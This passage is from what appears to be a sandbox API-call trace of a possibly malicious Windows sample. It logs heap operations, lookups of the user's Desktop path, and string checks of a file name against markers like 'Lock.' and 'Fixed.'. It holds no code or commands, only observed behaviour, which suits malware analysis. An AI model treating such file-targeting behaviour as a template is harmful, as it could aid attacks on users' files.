lpString1="PqlEG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0086.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qlEG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0086.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lEG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EG.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0086.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0086.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0086.969] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0086.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0086.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0086.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0086.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0086.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0086.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0086.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0086.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0086.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0086.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2a) returned 0x2aa6108 [0086.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="63ZOACO2R_kPqlEG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3ZOACO2R_kPqlEG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZOACO2R_kPqlEG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OACO2R_kPqlEG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ACO2R_kPqlEG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CO2R_kPqlEG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O2R_kPqlEG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2R_kPqlEG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_kPqlEG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_kPqlEG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kPqlEG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PqlEG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qlEG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lEG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EG.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0086.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa64f8 [0086.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0086.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0086.970] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0086.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76db0 [0086.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0086.970] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71fe8 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0086.971] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0086.971] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66f0 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0086.971] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.971] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0086.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6760 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0086.972] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0086.972] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0086.972] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.972] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0086.972] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0086.972] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0086.972] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0086.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0086.972] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/63ZOACO2R_kPqlEG.m4a", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 0x9a41c0 [0086.972] FindClose (in: hFindFile=0x9a41c0 | out: hFindFile=0x9a41c0) returned 1 [0086.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0086.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0086.973] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0086.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77620 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0086.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0086.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0086.974] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77620 [0086.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0086.974] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0086.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0086.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9688 [0086.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0086.974] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0086.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0086.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0086.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77620 [0086.975] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0086.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0086.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0086.975] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0086.975] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0086.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77620 [0086.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.975] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0086.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0086.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.975] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0086.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0086.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0086.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0086.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77620 [0086.975] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0086.976] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0086.976] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0086.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0086.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0086.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0086.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0086.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.976] RtlAllocateHeap 